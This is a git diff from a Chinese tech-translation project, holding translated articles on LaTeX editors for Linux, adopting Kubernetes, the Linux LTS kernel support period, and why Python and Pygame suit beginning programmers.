事先说明一下,以下列表并没有一个明确的先后顺序,序号为 3 的编辑器并不一定比序号为 7 的编辑器优秀。
|
||||
|
||||
### 1\. LyX
|
||||
|
||||
![][2]
|
||||
|
||||
![][5]
|
||||
|
||||
LyX 是一个开源的 LaTeX 编辑器,即是说它是网络上可获取到的最好的文档处理引擎之一。LyX 帮助你集中于你的文章,并忘记对单词的格式化,而这些正是每个 LaTeX 编辑器应当做的。LyX 能够让你根据文档的不同,管理不同的文档内容。一旦安装了它,你就可以控制文档中的很多东西了,例如页边距,页眉,页脚,空白,缩进,表格等等。
|
||||
|
||||
假如你正忙着精心撰写科学性的文档,研究论文或类似的文档,你将会很高兴能够体验到 LyX 的公式编辑器,这也是其特色之一。 LyX 还包括一系列的教程来入门,使得入门没有那么多的麻烦。
|
||||
|
||||
[LyX][6]
|
||||
|
||||
### 2\. Texmaker
|
||||
|
||||
![][2]
|
||||
|
||||
![][7]
|
||||
|
||||
Texmaker 被认为是 GNOME 桌面环境下最好的 LaTeX 编辑器之一。它呈现出一个非常好的用户界面,带来了极好的用户体验。它也被冠以最实用的 LaTeX 编辑器之一。假如你经常进行 PDF 的转换,你将发现 TeXmaker 相比其他编辑器更加快速。在你书写的同时,你也可以预览你的文档最终将是什么样子的。同时,你也可以观察到可以很容易地找到所需要的符号。
|
||||
|
||||
Texmaker 也提供一个扩展的快捷键支持。你有什么理由不试着使用它呢?
|
||||
|
||||
[Texmaker][8]
|
||||
|
||||
### 3\. TeXstudio
|
||||
|
||||
![][2]
|
||||
|
||||
![][9]
|
||||
|
||||
假如你想要一个这样的 LaTeX 编辑器:它既能为你提供相当不错的自定义功能,又带有一个易用的界面,那么 TeXstudio 便是一个完美的选择。它的 UI 确实很简单,但是不粗糙。 TeXstudio 带有语法高亮,自带一个集成的阅读器,可以让你检查参考文献,同时还带有一些其他的辅助工具。
|
||||
|
||||
它同时还支持某些酷炫的功能,例如自动补全,链接覆盖,书签,多游标等等,这使得书写 LaTeX 文档变得比以前更加简单。
|
||||
|
||||
TeXstudio 的维护很活跃,对于新手或者高级写作者来说,这使得它成为一个引人注目的选择。
|
||||
|
||||
[TeXstudio][10]
|
||||
|
||||
### 4\. Gummi
|
||||
|
||||
![][2]
|
||||
|
||||
![][11]
|
||||
|
||||
Gummi 是一个非常简单的 LaTeX 编辑器,它基于 GTK+ 工具箱。当然,在这个编辑器中你找不到许多华丽的选项,但如果你只想能够立刻着手写作, 那么 Gummi 便是我们给你的推荐。它支持将文档输出为 PDF 格式,支持语法高亮,并帮助你进行某些基础的错误检查。尽管在 GitHub 上它已经不再被活跃地维护,但它仍然工作地很好。
|
||||
|
||||
[Gummi][12]
|
||||
|
||||
### 5\. TeXpen
|
||||
|
||||
![][2]
|
||||
|
||||
![][13]
|
||||
|
||||
TeXpen 是另一个简洁的 LaTeX 编辑器。它为你提供了自动补全功能。但其用户界面或许不会让你感到印象深刻。假如你对用户界面不在意,又想要一个超级容易的 LaTeX 编辑器,那么 TeXpen 将满足你的需求。同时 TeXpen 还能为你校正或提高在文档中使用的英语语法和表达式。
|
||||
|
||||
[TeXpen][14]
|
||||
|
||||
### 6\. ShareLaTeX
|
||||
|
||||
![][2]
|
||||
|
||||
![][15]
|
||||
|
||||
ShareLaTeX 是一款在线 LaTeX 编辑器。假如你想与某人或某组朋友一同协作进行文档的书写,那么这便是你所需要的。
|
||||
|
||||
它提供一个免费方案和几种付费方案。甚至来自哈佛大学和牛津大学的学生也都使用它来进行个人的项目。其免费方案还允许你添加一位协作者。
|
||||
|
||||
其付费方案允许你与 GitHub 和 Dropbox 进行同步,并且能够记录完整的文档修改历史。你可以为你的每个方案选择多个协作者。对于学生,它还提供单独的计费方案。
|
||||
|
||||
[ShareLaTeX][16]
|
||||
|
||||
### 7\. Overleaf
|
||||
|
||||
![][2]
|
||||
|
||||
![][17]
|
||||
|
||||
Overleaf 是另一款在线的 LaTeX 编辑器。它与 ShareLaTeX 类似,它为专家和学生提供了不同的计费方案。它也提供了一个免费方案,使用它你可以与 GitHub 同步,检查你的修订历史,或添加多个合作者。
|
||||
|
||||
在每个项目中,它对文件的数目有所限制。所以在大多数情况下如果你对 LaTeX 文件非常熟悉,这并不会为你带来不便。
|
||||
|
||||
[Overleaf][18]
|
||||
|
||||
### 8\. Authorea
|
||||
|
||||
![][2]
|
||||
|
||||
![][19]
|
||||
|
||||
Authorea 是一个美妙的在线 LaTeX 编辑器。当然,如果考虑到价格,它可能不是最好的一款。对于免费方案,它有 100 MB 的数据上传限制和每次只能创建一个私有文档。而付费方案则提供更多的额外好处,但如果考虑到价格,它可能不是最便宜的。你应该选择 Authorea 的唯一原因应该是因为其用户界面。假如你喜爱使用一款提供令人印象深刻的用户界面的工具,那就不要错过它。
|
||||
|
||||
[Authorea][20]
|
||||
|
||||
### 9\. Papeeria
|
||||
|
||||
![][2]
|
||||
|
||||
![][21]
|
||||
|
||||
Papeeria 是在网络上你能够找到的最为便宜的 LaTeX 在线编辑器,如果考虑到它和其他的编辑器一样可信赖的话。假如你想免费地使用它,则你不能使用它开展私有项目。但是,如果你更偏爱公共项目,它允许你创建不限数目的项目,添加不限数目的协作者。它的特色功能是有一个非常简便的画图构造器,并且在无需额外费用的情况下使用 Git 同步。假如你偏爱付费方案,它赋予你创建 10 个私有项目的能力。
|
||||
|
||||
[Papeeria][22]
|
||||
|
||||
### 10\. Kile
|
||||
|
||||
![Kile LaTeX 编辑器][2]
|
||||
|
||||
![Kile LaTeX 编辑器][23]
|
||||
|
||||
位于我们最好 LaTeX 编辑器清单的最后一位是 Kile 编辑器。有些朋友对 Kile 推崇备至,很大程度上是因为其提供某些特色功能。
|
||||
|
||||
Kile 不仅仅是一款编辑器,它还是一款类似 Eclipse 的 IDE 工具,提供了针对文档和项目的一整套环境。除了快速编译和预览功能,你还可以使用诸如命令的自动补全,插入引用,按照章节来组织文档等功能。你真的应该使用 Kile 来见识其潜力。
|
||||
|
||||
Kile 在 Linux 和 Windows 平台下都可获取到。
|
||||
|
||||
[Kile][24]
|
||||
|
||||
### 总结
|
||||
|
||||
所以上面便是我们推荐的 LaTeX 编辑器,你可以在 Ubuntu 或其他 Linux 发行版本中使用它们。
|
||||
|
||||
当然,我们可能还遗漏了某些可以在 Linux 上使用并且有趣的 LaTeX 编辑器。如若你正好知道它们,请在下面的评论中让我们知晓。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/LaTeX-editors-linux/
|
||||
|
||||
作者:[Ankush Das][a]
|
||||
译者:[FSSlc](https://github.com/FSSlc)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ankush/
|
||||
[1]:https://www.LaTeX-project.org/
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/LaTeX-sample-example.jpeg
|
||||
[4]:https://itsfoss.com/open-source-tools-writers/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/10/LyX_LaTeX_editor.jpg
|
||||
[6]:https://www.LyX.org/
|
||||
[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_LaTeX_editor.jpg
|
||||
[8]:http://www.xm1math.net/texmaker/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_LaTeX_editor.jpg
|
||||
[10]:https://www.texstudio.org/
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_LaTeX_editor.jpg
|
||||
[12]:https://github.com/alexandervdm/gummi
|
||||
[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_LaTeX_editor.jpg
|
||||
[14]:https://sourceforge.net/projects/texpen/
|
||||
[15]:https://itsfoss.com/wp-content/uploads/2017/10/shareLaTeX.jpg
|
||||
[16]:https://www.shareLaTeX.com/
|
||||
[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg
|
||||
[18]:https://www.overleaf.com/
|
||||
[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg
|
||||
[20]:https://www.authorea.com/
|
||||
[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_LaTeX_editor.jpg
|
||||
[22]:https://www.papeeria.com/
|
||||
[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-LaTeX-800x621.png
|
||||
[24]:https://kile.sourceforge.io/
|
90
translated/tech/20171120 Adopting Kubernetes step by step.md
Normal file
90
translated/tech/20171120 Adopting Kubernetes step by step.md
Normal file
@ -0,0 +1,90 @@
|
||||
一步步采用 Kubernetes
|
||||
============================================================
|
||||
|
||||
为什么选择 Docker 和 Kubernetes 呢?
|
||||
|
||||
容器允许我们构建,发布和运行分布式应用。他们使应用程序摆脱了机器限制,让我们以一定的方式创建一个复杂的应用程序。
|
||||
|
||||
使用容器编写应用程序可以使开发,QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
|
||||
|
||||
[Docker][1] 可以使软件独立于云提供商的容器化平台。
|
||||
|
||||
但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是非常重要的。应用程序通常需要自动伸缩组,持久远程光盘,自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
|
||||
|
||||
这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理,缩放和部署应用程序的不同部分,并且成为其中的重要工具。它抽象出来以兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
|
||||
|
||||
通过一个方法来想象一下应用程序,容器和 Kubernetes 。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护... 这正是应用 Kubernetes 集群的地方。
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
|
||||
Evolution to Kubernetes
|
||||
|
||||
Kubernetes 由云提供商提供支持,从开发到生产,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件,服务或另外一些基础设施。
|
||||
|
||||
事实上,您可以在您的机器中使用与生产环境相同的部件启动应用程序,从而缩小了开发和生产环境之间的差距。这使得开发人员更了解应用程序是如何构建在一起的,尽管他们可能只负责应用程序的一部分。这也使得在开发流程中的应用程序更容易的快速完成测试。
|
||||
|
||||
如何使用 Kubernetes 工作?
|
||||
|
||||
随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境开发?假设有 3 个环境,开发,质量保证和生产, 如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在正在运行的应用程序中看到修改代码所花费的时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)
|
||||
|
||||
那么,我是否应该总是在 Kubernetes 集群中编码,构建映像,重新部署服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群的其中之一(或一组集群)呢?还是,我应该以混合方式工作?
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
|
||||
Development with a local cluster
|
||||
|
||||
如果继续我们之前的比喻,使其保持在一个开发集群中的同时侧面的通道代表着修改应用程序的一种方式。这通常通过[volumes][4]来实现
|
||||
|
||||
一个 Kubernetes 系列
|
||||
|
||||
Kubernetes 系列资源是开源的,可以在这里找到:
|
||||
|
||||
### [https://github.com/red-gate/ks][5]
|
||||
|
||||
我们写这个系列作为练习以不同的方式构建软件。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
|
||||
|
||||
这个系列从使用 Kubernetes 创建基本的React应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
|
||||
|
||||
以下是这个系列的前 5 部分:
|
||||
|
||||
1. ks1: 使用 Kubernetes 构建一个React应用程序
|
||||
|
||||
2. ks2: 使用 minikube 检测 React 代码的更改
|
||||
|
||||
3. ks3: 添加一个提供 API 的 Python Web 服务器
|
||||
|
||||
4. ks4: 使 minikube 检测 Python 代码的更改
|
||||
|
||||
5. ks5: 创建一个测试环境
|
||||
|
||||
本系列的第二部分将添加一个数据库,并尝试找出最好的方式来发展我们的应用程序。
|
||||
|
||||
|
||||
通过在所有环境中运行 Kubernetes,我们被迫在解决新问题的时候也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
|
||||
|
||||
下一步是什么?
|
||||
|
||||
我们将通过整合数据库和练习来继续这个系列,以找到使用 Kubernetes 获得数据库生命周期的最佳体验方法。
|
||||
|
||||
这个 Kubernetes 系列是由 Redgate 研发部门的 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
|
||||
* * *
|
||||
|
||||
我们正在招聘。您是否有兴趣开发产品,创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
|
||||
|
||||
作者:[santiago arias][a]
|
||||
译者:[aiwhj](https://github.com/aiwhj)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.com/@santiaago?source=post_header_lockup
|
||||
[1]:https://www.docker.com/what-docker
|
||||
[2]:https://kubernetes.io/
|
||||
[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM
|
||||
[4]:https://kubernetes.io/docs/concepts/storage/volumes/
|
||||
[5]:https://github.com/red-gate/ks
|
||||
[6]:mailto:foundry@red-gate.com
|
||||
[7]:https://www.red-gate.com/foundry/
|
||||
[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies
|
||||
[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge
|
@ -1,45 +0,0 @@
|
||||
Linux 长期支持版关于未来的声明
|
||||
===============================
|
||||
Linux 4.4 长期支持版将得到 6年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。
|
||||
[视频](http://www.zdnet.com/video/video-torvalds-surprised-by-resilience-of-2-6-kernel-1/)
|
||||
_视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_
|
||||
|
||||
在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。
|
||||
正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 google+ 上发文解释说,"尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。仅仅因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。"
|
||||
所以,简而言之,Linux 4.14 将支持到 2020年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。
|
||||
[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。
|
||||
Linux 其它的版本有尝鲜版或发布候选版(RC),主线版,稳定版和 LTS 版。
|
||||
RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树为了通用才发布时,它被称为"稳定版"。一个稳定版内核漏洞的修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。
|
||||
对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,"Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你应该断然不要去计划这件事。"
|
||||
Kroah-Hartman 在 Ryabitsev 的文章中仅仅添加了:"[他的言论][12]"
|
||||
|
||||
-------------------
|
||||
via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/
|
||||
|
||||
作者:[Steven J. Vaughan-Nichols ][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2
|
||||
[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/
|
||||
[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/
|
||||
[7]:https://www.android.com/
|
||||
[8]:https://www.linuxfoundation.org/
|
||||
[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9
|
||||
[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/
|
||||
[11]:https://www.kernel.org/releases.html
|
||||
[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc
|
||||
[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[15]:http://www.zdnet.com/blog/open-source/
|
||||
[16]:http://www.zdnet.com/topic/enterprise-software/
|
||||
|
||||
|
||||
|
||||
|
@ -0,0 +1,140 @@
|
||||
为什么说 Python 和 Pygame 最适合初学者
|
||||
============================================================
|
||||
|
||||
### 我们有三个理由来说明 Pygame 对初学编程者是最好的选择。
|
||||
|
||||
|
||||
![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?")
|
||||
图片来源: [opensource.com](https://opensource.com)
|
||||
|
||||
上个月,[Scott Nesbitt][10] 发表了一篇标题为[ Mozilla 支出 50 万美元来支持开源项目][11]的文章。其中 Phaser,一个基于 HTML/JavaScript 的游戏平台项目,获得了 50,000 美元的奖励。整整一年里,我都在使用 Phaser 平台来教我的小女儿,用来学习的话,它是最简单也是最好的 HTML 游戏开发平台。然而,对于初学者来说,使用[ Pygame ][13]也许效果更好。原因如下:
|
||||
|
||||
### 1\. 小段代码块
|
||||
|
||||
Pygame,基于 Python,[在介绍计算机课程中最流行的语言][14]。Python 非常适合用一小段代码来实现我们的想法,孩子们可以从单个文件和单个代码块起开始学习,在掌握函数 (function) 或类 (class) 对象之前,就可以写出意大利面条似的代码。 很像手指画,所想即所得。
|
||||
|
||||
更多 Python 资源链接
|
||||
|
||||
* [Python 是什么?][1]
|
||||
|
||||
* [最热门 Python IDEs][2]
|
||||
|
||||
* [最热门 Python GUI 框架][3]
|
||||
|
||||
* [最新 Python 话题][4]
|
||||
|
||||
* [更多开发资源][5]
|
||||
|
||||
以这样的方式来学习,当编写的代码越来越难于管理的时候,孩子们很自然就的就会把代码分解成函数模块和类模块。在学习函数之前就学习了 Python 语言的语法,学生将掌握基本的编程知识,对了解全局作用域和局部作用域起到更好的作用。
|
||||
|
||||
大多数 HTML 游戏在一定程度上会将结构、样式和编程逻辑分为 HTML、CSS和JavaScript,并且需要 CSS 和 HTML 的知识。从长远来看,虽然拆分更好,但对初学者来说是个障碍。一旦孩子们发现他们可以用 HTML 和 CSS 快速构建网页,很有可能就会被颜色、字体和图形的视觉刺激分散注意力。即使有仅仅只专注于 JavaScript 代码的,也需要学习基本的文档结构模型,以使 JavaScript 代码能够嵌入进去。
|
||||
|
||||
### 2\. 全局变量更清晰
|
||||
|
||||
Python 和 JavaScript 都使用动态类型变量,这意味着变量只有在赋值才能确定其类型为一个字符串、一个整数或一个浮点数,其中 JavaScript 更容易出错。类似于类型变量,JavaScript 和 Python 都有全局变量和局部变量之分。Python 中,如果在函数块内要使用全局变量,就会以 `global` 关键字区分出来。
|
||||
|
||||
要理解在 Phaser 上教授编程初学者所面临的挑战的话,让我们以基本的[制作您的第一个 Phaser 游戏教程][15]为例子,它是由 Alvin Ourrad 和 Richard Davey 开发制作的。在 JavaScript 中,程序中任何地方都可以访问的全局变量很难追踪调试,常常引起 Bug 且很难解决。因为 Richard 和 Alvin 是专业程序员,所以在这儿特意使用全局变量以使程序简洁。
|
||||
|
||||
```
|
||||
var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update });
|
||||
|
||||
function preload() {
|
||||
|
||||
game.load.image('sky', 'assets/sky.png');
|
||||
|
||||
}
|
||||
|
||||
var player;
|
||||
var platforms;
|
||||
|
||||
function create() {
|
||||
game.physics.startSystem(Phaser.Physics.ARCADE);
|
||||
…
|
||||
```
|
||||
|
||||
在他们的 Phaser 编程手册 [《Interphase》][16] 中,Richard Davey 和 Ilija Melentijevic 解释说:在很多 Phaser 项目中通常都会使用全局变量,原因是使用它们完成任务更容易、更快捷。
|
||||
|
||||
> “如果您开发过游戏,只要代码量到一定规模,那么(使用全局变量)这种做法会使您陷入困境的,可是我们为什么还要这样做?原因很简单,仅仅只是要使我们的 Phaser 项目容易完成,更简单而已。”
|
||||
|
||||
针对一个 Phaser 应用程序,虽然可以使用局部变量和拆分代码块来达到关注点隔离这些手段来重构代码,但要使第一次学习编程的小孩能理解,显然很有难度的。
|
||||
|
||||
如果您想教你的孩子学习 JavaScript,或者如果他们已经知道怎样使用像 Python 来编程的话,有个好的 Phaser 课程推荐: [完整的手机游戏开发课程] [17],是由 [ Pablo Farias Navarro ] [18] 开发制作的。虽然标题看着是移动游戏,但实际是关于 JavaScript 和 Phaser 的。JavaScript 和 Phaser 移动应用开发已经转移到 [PhoneGap][19] 话题去了。
|
||||
|
||||
### 3\. Pygame 无依赖要求
|
||||
|
||||
由于 [Python Wheels][20] 的出现,Pygame 超级[容易安装][21]。在 Fedora/Red Hat 系统下也可使用 **yum** 包管理器来安装:
|
||||
|
||||
```
|
||||
sudo yum install python3-pygame
|
||||
```
|
||||
|
||||
更多消息请参考官网[Pygame 安装说明文档][22]。
|
||||
|
||||
相比来说,虽然 Phaser 本身更容易安装,但需要掌握更多的知识。前面提到的,学生需要在 HTML 文档中组装他们的 JavaScript 代码,同时还需要些 CSS。除了这三种语言(HTML、CSS、JavaScript),还需要使用火狐或谷歌开发工具和编辑器。JavaScript 最常用的编辑器有 Sublime、Atom、VS Code(按使用多少排序)等。
|
||||
|
||||
由于[浏览器同源策略][23]的原因,如果您直接在浏览器中打开 HTML 文件的话,Phaser 应用是不会运行的。您必须运行 Web 服务,并通过服务访问这些文件。还好,对于大多数工程项目,可以不用在本地运行 Apache 服务,只需要运行一些轻量级的服务就可以,比如 [httpster][24]。
|
||||
|
||||
### Phaser 和 JavaScript 的优势
|
||||
|
||||
JavaScript 和 Phaser 有着种种的不好,为什么我还继续教授他们?老实说,我考虑了很长一段时间,我在担心着学生学习变量申明提升和变量作用域的揪心。所有我开发出基于 Pygame 和 Python 的课程,随后也开发出一涛基于 Phaser 的。最终,我决定使用 Pablo 预先制定的课程作为起点。
|
||||
|
||||
我转用 JavaScript 有两个原因。首先,JavaScript 已经成为正式应用的正式语言。除了 Web 应用外,也可使用于移动和服务应用方面。JavaScript 无处不在,其广泛应用于孩子们每天都能看到的应用中。如果他们的朋友使用 Javascript 来编程,他们很可能也会受影响而使用之。正如我看到了 JavaScript 背后的动力,所以深入研究了可编译成 JavaScript 的替代语言,主要是 Dart 和 TypeScript 两种。虽然我不介意额外的转换步骤,但还是最喜欢 JavaScript。
|
||||
|
||||
最后,我选择使用 Phaser 和 JavaScript 的组合,是因为我意识到上面那些问题在 JavaScript 可以被解决,仅仅只是一些工作量而已。高质量的调试工具和一些大牛们的人的工作使得 JavaScript 成为教育孩子编码的可用和有用的语言。
|
||||
|
||||
### 最后话题: Python 对垒 JavaScript
|
||||
|
||||
当家长问我使用的什么语言作为孩子的入门语言时,我会立即推荐 Python 和 Pygame。因为有成千上万的课程可选,而且大多数都是免费的。我为我的儿子选择了 Al Sweigart 的 [使用 Python 和 Pygame 开发游戏][25] 课程,同时也在使用 Allen B. Downey 的 [Python 编程思想:如何像计算机科学家一样思考][7]。在 Android 手机上可以使用 [ Tom Rothame ][27]的[ PAPT Pyame][26] 来安装 Pygame 游戏。
|
||||
|
||||
那是好事。JavaScript 是一门成熟的编程语言,有很多很多辅助工具。但有多年的帮助大儿子使用 Python 创建炫酷游戏经历的我,依然钟情于 Python 和 Pygame。
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28]
|
||||
|
||||
Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/pygame
|
||||
|
||||
作者:[Craig Oda ][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/codetricity
|
||||
[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ
|
||||
[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ
|
||||
[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ
|
||||
[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc
|
||||
[7]:http://greenteapress.com/thinkpython/html/index.html
|
||||
[8]:https://opensource.com/users/codetricity
|
||||
[9]:https://opensource.com/user/46031/feed
|
||||
[10]:https://opensource.com/users/scottnesbitt
|
||||
[11]:https://opensource.com/article/17/10/news-october-14
|
||||
[12]:https://www.patreon.com/photonstorm/posts
|
||||
[13]:https://www.pygame.org/news
|
||||
[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext
|
||||
[15]:http://phaser.io/tutorials/making-your-first-phaser-game
|
||||
[16]:https://phaser.io/interphase
|
||||
[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/
|
||||
[18]:https://gamedevacademy.org/author/fariazz/
|
||||
[19]:https://phonegap.com/
|
||||
[20]:https://pythonwheels.com/
|
||||
[21]:https://pypi.python.org/pypi/Pygame
|
||||
[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation
|
||||
[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
|
||||
[24]:https://simbco.github.io/httpster/
|
||||
[25]:https://inventwithpython.com/makinggames.pdf
|
||||
[26]:https://github.com/renpytom/rapt-pygame-example
|
||||
[27]:https://github.com/renpytom
|
||||
[28]:https://opensource.com/users/codetricity
|
||||
[29]:https://opensource.com/users/codetricity
|
||||
[30]:https://opensource.com/users/codetricity
|
||||
[31]:https://opensource.com/article/17/11/pygame#comments
|
||||
[32]:https://opensource.com/tags/python
|
||||
[33]:https://opensource.com/tags/programming
|
@ -0,0 +1,146 @@
|
||||
2018 年开源技术 10 大发展趋势
|
||||
============================================================
|
||||
|
||||
### 你是否关注过开源技术的发展趋势?
|
||||
|
||||
